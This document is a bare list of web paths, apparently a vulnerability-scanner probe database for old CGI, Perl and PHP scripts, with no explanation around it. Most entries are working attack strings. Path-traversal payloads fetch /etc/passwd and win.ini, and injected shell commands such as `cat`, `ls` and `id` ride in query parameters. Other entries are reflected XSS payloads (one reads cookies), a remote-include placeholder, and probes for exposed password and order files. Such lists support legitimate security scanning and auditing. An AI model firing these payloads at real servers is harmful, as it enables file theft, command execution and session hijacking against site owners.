Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
